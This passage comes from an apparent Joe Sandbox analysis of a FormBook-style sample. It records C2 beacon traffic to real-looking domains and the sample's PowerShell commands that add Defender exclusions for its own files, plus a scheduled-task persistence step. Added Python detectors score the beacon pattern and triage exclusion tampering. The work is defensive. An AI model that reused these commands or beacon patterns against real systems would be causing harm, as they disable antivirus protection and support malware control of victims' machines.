                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 2f 64 6d 43 43 57 43 7a 49 69 76 70 71 76 5a 64 6f 65 48 79 61 77 7a 79 38 2b 50 65 65 73 66 72 79 7a 42 49 4e 36 51 75 4d 50 4e 66 4f 51 76 44 5a 57 2b 62 44 32 63 59 6a 50 6a 42 4d 79 78 76 35 51 57 41 69 45 6f 32 47 69 39 76 36 43 76 42 4b 6a 76 34 41 52 58 41 4b 56 41 51 72 52 34 42 75 65 42 64 6e 6d 64 4a 47 74 4f 44 31 56 4e 5a 71 57 30 59 61 33 7a 6a 50 61 48 66 4e 65 5a 37 7a 56 4a 2b 46 50 6a 41 71 78 6c 55 68 58 76 37 79 57 6f 57 48 4d 4c 47 70 4e 6d 33 67 53 43 55 69 44 49 76 2f 69 44 66 65 37 63 72 32 73 74 72 32 41 4f 6d 6b 51 3d 3d
                                              Data Ascii: gNl=P++oEPfFrsp+/dmCCWCzIivpqvZdoeHyawzy8+PeesfryzBIN6QuMPNfOQvDZW+bD2cYjPjBMyxv5QWAiEo2Gi9v6CvBKjv4ARXAKVAQrR4BueBdnmdJGtOD1VNZqW0Ya3zjPaHfNeZ7zVJ+FPjAqxlUhXv7yWoWHMLGpNm3gSCUiDIv/iDfe7cr2str2AOmkQ==
Timestamp: Jul 8, 2024 09:36:51.617281914 CEST  Bytes transferred: 646  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_ace6c878ffe446dba7a57a3ca9ee6246
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


Session ID: 42  Source IP: 192.168.2.4  Source Port: 49784  Destination IP: 103.168.172.37  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:53.684487104 CEST  Bytes transferred: 736  Direction: OUT  Data: POST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 77 64 57 43 41 30 71 7a 41 69 76 32 33 66 5a 64 6a 2b 48 32 61 77 2f 79 38 36 2f 4f 64 65 37 72 7a 52 5a 49 4d 2f 6b 75 42 76 4e 66 46 77 76 38 47 47 2f 56 44 32 51 2b 6a 4e 33 42 4d 79 6c 76 35 52 6d 41 69 7a 30 70 47 79 39 74 79 69 76 50 45 44 76 34 41 52 58 41 4b 56 55 36 72 52 67 42 76 74 70 64 6d 48 64 4f 4c 4e 4f 45 68 46 4e 5a 75 57 30 55 61 33 79 30 50 62 4b 36 4e 63 68 37 7a 52 4e 2b 46 2b 6a 42 78 42 6c 53 2b 6e 75 36 37 7a 31 35 48 75 66 49 75 76 69 6c 6c 6a 72 32 75 6c 5a 31 75 54 69 49 4d 37 34 59 72 72 6b 66 37 44 7a 76 2f 63 47 63 4c 44 55 7a 6f 4a 58 2f 34 6d 61 76 77 35 33 32 57 61 4d 3d
                                              Data Ascii: gNl=P++oEPfFrsp+wdWCA0qzAiv23fZdj+H2aw/y86/Ode7rzRZIM/kuBvNfFwv8GG/VD2Q+jN3BMylv5RmAiz0pGy9tyivPEDv4ARXAKVU6rRgBvtpdmHdOLNOEhFNZuW0Ua3y0PbK6Nch7zRN+F+jBxBlS+nu67z15HufIuvilljr2ulZ1uTiIM74Yrrkf7Dzv/cGcLDUzoJX/4mavw532WaM=
Timestamp: Jul 8, 2024 09:36:54.177138090 CEST  Bytes transferred: 646  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:54 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_a6efb1f31221a247a14ca3c0e8b38e20
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


Session ID: 43  Source IP: 192.168.2.4  Source Port: 49785  Destination IP: 103.168.172.37  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:56.214624882 CEST  Bytes transferred: 10818  Direction: OUT  Data: POST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 77 64 57 43 41 30 71 7a 41 69 76 32 33 66 5a 64 6a 2b 48 32 61 77 2f 79 38 36 2f 4f 64 65 7a 72 7a 67 35 49 4f 63 38 75 41 76 4e 66 49 51 76 48 47 47 2f 59 44 32 34 69 6a 4e 36 2b 4d 77 64 76 32 54 65 41 6b 43 30 70 49 79 39 74 74 79 76 43 4b 6a 76 49 41 52 48 45 4b 56 45 36 72 52 67 42 76 6f 74 64 32 6d 64 4f 4e 4e 4f 44 31 56 4e 64 71 57 30 77 61 7a 6d 6b 50 62 4f 41 4f 73 42 37 7a 78 64 2b 57 63 62 42 39 42 6c 51 2f 6e 76 70 37 7a 78 6d 48 75 43 33 75 75 47 4c 6c 67 33 32 74 7a 6b 68 32 77 79 51 61 62 68 4b 70 49 49 65 6a 67 4c 4a 78 65 69 54 45 42 49 76 71 71 4c 4c 36 30 69 67 7a 5a 69 73 44 2b 7a 54 54 56 72 49 7a 4c 74 50 54 74 39 50 47 39 68 37 48 76 77 4b 2b 70 61 39 6f 2f 72 54 6e 51 6f 6f 49 55 55 64 64 46 4f 4f 4f 59 74 78 52 35 44 50 4a 36 65 4b 6e 49 55 53 55 69 75 6d 52 5a 72 58 79 5a 6f 79 69 6f 39 59 4b 30 7a 55 58 2b 74 78 71 4b 56 45 39 68 35 44 77 4f 6e 6b 49 45 6a 39 58 37 66 57 62 4a 30 75 33 63 37 64 50 51 48 62 53 57 35 45 34 51 [TRUNCATED]
Data Ascii: gNl=[TRUNCATED]
Timestamp: Jul 8, 2024 09:36:56.709939003 CEST  Bytes transferred: 646  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:56 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_f36ea58d1e3d6efb07d1ea9618fb2aa1
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


Session ID: 44  Source IP: 192.168.2.4  Source Port: 49786  Destination IP: 103.168.172.37  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:58.748591900 CEST  Bytes transferred: 451  Direction: OUT  Data: GET /blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.jleabres.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Timestamp: Jul 8, 2024 09:36:59.205349922 CEST  Bytes transferred: 796  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:59 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 544
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_13f27a3d4ba3fee707956bee565fe02d
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
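
Sessions 38 to 44 above repeat one request shape against two hosts: a POST to a short directory path (/3rdj/, /blhi/) whose body is a single opaque form field (gNl=...), Origin and Referer that point back at the same host and path, a fixed "Windows NT 6.0 ... Chrome/44.0.2403.155" User-Agent, Connection: close on every request, and then a GET to the same path carrying the same field name plus a second short parameter (QdC) in the query string; every reply is a 404. The Python below is an added example and is not part of the Joe Sandbox report or of the sample. It parses raw requests of that form and scores each host on those structural traits. The names gNl, QdC, the two paths and the User-Agent string come from the captured requests; the trait names, the score weights and the 32-character floor for an "opaque" value are this example's own choices. The sample input is a constructed replica of sessions 38, 40, 41 and 44 with the gNl payloads truncated, plus one constructed benign request as a control.

```python
"""Score raw HTTP requests for the beacon shape recorded in sessions 38-44.
Added example, not part of the Joe Sandbox report. gNl, QdC, the paths and the
User-Agent come from the captured requests; trait names, the weights and the
32-character floor for "opaque" values are this example's own choices."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

BEACON_UA = ("Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36")
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{3,8}/$")        # /3rdj/, /blhi/
OPAQUE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")     # base64-looking blob
CRLF = "\r\n"

def parse_request(raw):
    """Split one CRLF-framed HTTP/1.1 request into method, path, query, headers, body."""
    head, _, body = raw.partition(CRLF + CRLF)
    request_line, *header_lines = head.split(CRLF)
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Split by hand: parse_qsl would turn the '+' inside base64 into a space.
    query = dict(p.split("=", 1) for p in parts.query.split("&") if "=" in p)
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body}

def form_fields(body):
    return dict(p.split("=", 1) for p in body.split("&") if "=" in p)

def indicators(req):
    """Traits of one request; each corresponds to something visible in the capture."""
    h, found = req["headers"], set()
    host = h.get("host", "")
    if h.get("user-agent") == BEACON_UA:
        found.add("stale_chrome44_ua")
    if SHORT_DIR.match(req["path"]):
        found.add("short_dir_path")
    if req["method"] == "POST":
        fields = form_fields(req["body"])
        if len(fields) == 1 and OPAQUE.match(next(iter(fields.values()))):
            found.add("single_opaque_form_field")
        if (h.get("origin") == f"http://{host}"
                and h.get("referer") == f"http://{host}{req['path']}"):
            found.add("self_referential_origin")
    elif req["method"] == "GET":
        if "referer" not in h and any(OPAQUE.match(v) for v in req["query"].values()):
            found.add("opaque_query_no_referer")
    return found

def correlate(raws):
    """Per host: union of traits, plus whether a field name POSTed in a body is
    echoed as a query parameter of a GET to the same path (the pairing above)."""
    by_endpoint = defaultdict(list)
    for raw in raws:
        req = parse_request(raw)
        by_endpoint[(req["headers"].get("host", ""), req["path"])].append(req)
    report = {}
    for (host, path), reqs in by_endpoint.items():
        posted = {n for r in reqs if r["method"] == "POST" for n in form_fields(r["body"])}
        queried = {n for r in reqs if r["method"] == "GET" for n in r["query"]}
        traits = set().union(*(indicators(r) for r in reqs))
        shared = sorted(posted & queried)
        report[host] = {"path": path, "shared_param": shared, "traits": sorted(traits),
                        "posts": sum(r["method"] == "POST" for r in reqs),
                        "gets": sum(r["method"] == "GET" for r in reqs),
                        "score": len(traits) + (2 if shared else 0)}
    return report

# Constructed sample input: replicas of sessions 38, 40, 41 and 44 with the gNl
# values truncated, plus one constructed benign request as a control.
COMMON = ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language: en-US,en", "Connection: close", "User-Agent: " + BEACON_UA]

def _req(line, headers, body=""):
    return CRLF.join([line, *headers]) + CRLF + CRLF + body

def beacon_post(host, path, body):
    return _req(f"POST {path} HTTP/1.1", COMMON + [
        "Accept-Encoding: gzip, deflate", "Cache-Control: no-cache",
        "Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
        f"Host: {host}", f"Origin: http://{host}", f"Referer: http://{host}{path}"], body)

def beacon_get(host, path, query):
    return _req(f"GET {path}?{query} HTTP/1.1", COMMON + [f"Host: {host}"])

SAMPLES = [
    beacon_post("www.qrdinamicos.com", "/3rdj/",
                "gNl=ubpPxEGjd5a4qp4xTXiSZqAFFo+KM3M11bZO7AmnCvqtuJ4QmdnTH+SxOu4Rrr6Kn4NchNW="),
    beacon_get("www.qrdinamicos.com", "/3rdj/",
               "QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9w="),
    beacon_post("www.jleabres.com", "/blhi/",
                "gNl=P++oEPfFrsp+/dmCCWCzIivpqvZdoeHyawzy8+PeesfryzBIN6QuMPNfOQvDZW+bD2c="),
    beacon_get("www.jleabres.com", "/blhi/",
               "gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7=&QdC=AFMh5N"),
    _req("GET /index.html HTTP/1.1", ["Host: www.example.com", "Connection: keep-alive",
         "Referer: https://www.example.com/", "User-Agent: Mozilla/5.0 (X11; Linux) Firefox/127.0"]),
]
```

Running correlate(SAMPLES) gives both contacted hosts a shared_param of ["gNl"] and all five traits, and the control host nothing. The parameter names, the directory path and the User-Agent are build-specific constants, so a rule keyed only on "gNl" or "/3rdj/" will miss the next build; the structural traits (self-referential Origin and Referer, one opaque field, the POST/GET pair on the same path) carry over better. A 404 from a contacted domain also does not clear it: FormBook builds carry a list of domains and work through them, and most entries are decoys, so a 404 from one host says nothing about the others.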


Target ID: 0
Start time: 03:32:55
Start date: 08/07/2024
Path: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
Imagebase: 0x1f0000
File size: 744'448 bytes
MD5 hash: 5CB7ACEF6FCB2F9FEED94483F364030A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:32:57
Start date: 08/07/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
Imagebase: 0x650000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
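
Target ID 2 above and Target ID 4 further down show the sample spawning an already-elevated PowerShell to run Add-MpPreference -ExclusionPath, first for its own image on the Desktop and then for the copy it writes under AppData\Roaming. The Python below is an added example, not part of the Joe Sandbox report, that triages such command lines the way a detection pipeline fed by process-creation telemetry would: it expands an -EncodedCommand argument if present, extracts every -Exclusion* target, and rates an exclusion for a user-writable path (or one hidden behind encoding) above one an administrator might plausibly add under Program Files. The two recorded command lines are copied from this process list; the encoded variant, the two controls, the list of user-writable roots and the severity rules are constructed for this example.

```python
"""Triage process-creation command lines for Defender exclusion tampering.
Added example, not part of the Joe Sandbox report. The two Add-MpPreference
command lines are copied from the process list above; the encoded variant,
the controls, the user-writable roots and the severity rules are constructed."""
import base64
import re

ADD_MP = re.compile(r"\bAdd-MpPreference\b", re.IGNORECASE)
EXCL_ARG = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+(\"[^\"]*\"|'[^']*'|\S+)",
    re.IGNORECASE)
# -EncodedCommand (and its abbreviations) carries base64 of a UTF-16LE script.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Roots a non-admin user, and therefore a dropper running as that user, can write to.
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(Users\\|ProgramData\\|Windows\\Temp\\)",
                           re.IGNORECASE)

def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand script so the scan sees the real cmdlet."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def triage(cmdline):
    """Return a finding dict for an exclusion being added, or None."""
    text = expand_encoded_command(cmdline)
    if not ADD_MP.search(text):
        return None
    targets = [(kind.lower(), val.strip("\"'")) for kind, val in EXCL_ARG.findall(text)]
    if not targets:
        return None
    user_paths = [v for k, v in targets
                  if k in ("path", "process") and USER_WRITABLE.match(v)]
    encoded = ENC_ARG.search(cmdline) is not None
    # An exclusion for a user-writable path, or one hidden behind encoding, is
    # the dropper pattern recorded above; an exclusion under Program Files on
    # its own still deserves review but is something an admin might do.
    severity = "high" if user_paths or encoded else "medium"
    return {"targets": targets, "user_writable": user_paths,
            "encoded": encoded, "severity": severity}

def encode_ps(script):
    """What 'powershell -EncodedCommand' expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
SAMPLE_CMDLINES = [
    # the two command lines recorded above (Target ID 2 and Target ID 4)
    PS + ' Add-MpPreference -ExclusionPath "C:\\Users\\user\\Desktop\\jlsvOH1c8bSRKqM.exe"',
    PS + ' Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\AZJifQrhDpEQCA.exe"',
    # constructed: the second exclusion hidden behind -EncodedCommand
    PS + " -NoProfile -EncodedCommand " + encode_ps(
        'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\AZJifQrhDpEQCA.exe"'),
    # constructed controls: an admin-style exclusion, and an unrelated process
    PS + ' Add-MpPreference -ExclusionPath "C:\\Program Files\\Microsoft SQL Server"',
    "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
]
```

Both recorded command lines and the encoded variant come back as high, the Program Files control as medium, and the conhost line as None. On a host that has already been touched, the same question is answered by Get-MpPreference | Select-Object -ExpandProperty ExclusionPath, and the entries are removed with Remove-MpPreference -ExclusionPath; the exclusions here were added by an elevated PowerShell, which is exactly the case Defender's Tamper Protection exists to block.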

                                              Target ID:3
                                              Start time:03:32:57
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x650000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
                                              Imagebase:0xe60000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
